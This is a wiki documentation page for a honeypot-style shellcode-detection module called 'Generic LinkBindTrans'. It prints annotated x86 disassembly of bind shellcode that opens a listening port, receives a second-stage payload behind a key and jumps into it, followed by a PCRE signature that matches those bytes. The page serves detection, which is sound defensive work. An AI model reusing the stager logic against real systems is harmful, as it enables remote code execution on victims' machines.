[[documentation:modules:shellcodehandler:sch_generic_link_bind_trans]]
 
Trace: home » documentation » documentation:modules » shellcodehandler » sch_generic_link_bind_trans
Table of Contents

ShellcodeHandler Generic LinkBindTrans

Vulnerability

Description

Reference

Analysis

      /*
                00402111   ba 83538300      mov edx,835383
                00402116   ffd6             call esi                                 ; socket()
                00402118   53               push ebx
                00402119   53               push ebx
                0040211a   53               push ebx
                0040211b   68 0200d63a      push 3ad60002                            ; 3ad6 <- port
                00402120   8bd4             mov edx,esp
                00402122   8bd8             mov ebx,eax
                00402124   6a 10            push 10
                00402126   52               push edx
                00402127   53               push ebx
                00402128   ba 0090a6c2      mov edx,c2a69000
                0040212d   ffd6             call esi                                 ; bind()
                0040212f   40               inc eax
                00402130   50               push eax
                00402131   53               push ebx
                00402132   ba 7a3b73a1      mov edx,a1733b7a
                00402137   ffd6             call esi                                 ; listen()
                00402139   50               push eax
                0040213a   50               push eax
                0040213b   53               push ebx
                0040213c   ba 10d36900      mov edx,69d310
                00402141   ffd6             call esi                                 ; accept()
                00402143   8bd8             mov ebx,eax
                00402145   33c0             xor eax,eax
                00402147   50               push eax
                00402148   b4 02            mov ah,2
                0040214a   50               push eax
                0040214b   55               push ebp
                0040214c   53               push ebx
                0040214d   ba 005860e2      mov edx,e2605800
                00402152   ffd6             call esi                                 ; recv()
                00402154   bf 1cf174c0      mov edi,c074f11c                         ; authentication key
                00402159   ffe5             jmp ebp
        */

Pattern

      const char *pcre =
                "\\xba\\x83\\x53\\x83\\x00\\xff\\xd6\\x53\\x53\\x53\\x68\\x02\\x00"
                "(..)\\x8b\\xd4\\x8b\\xd8\\x6a\\x10\\x52\\x53\\xba\\x00\\x90"
                "\\xa6\\xc2\\xff\\xd6\\x40\\x50\\x53\\xba\\x7a\\x3b\\x73\\xa1\\xff"
                "\\xd6\\x50\\x50\\x53\\xba\\x10\\xd3\\x69\\x00\\xff\\xd6\\x8b\\xd8"
                "\\x33\\xc0\\x50\\xb4\\x02\\x50\\x55\\x53\\xba\\x00\\x58\\x60\\xe2"
                "\\xff\\xd6\\xbf(....)\\xff\\xe5";

Dependencies

 
documentation/modules/shellcodehandler/sch_generic_link_bind_trans.txt · Last modified: 2006/02/17 14:01
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki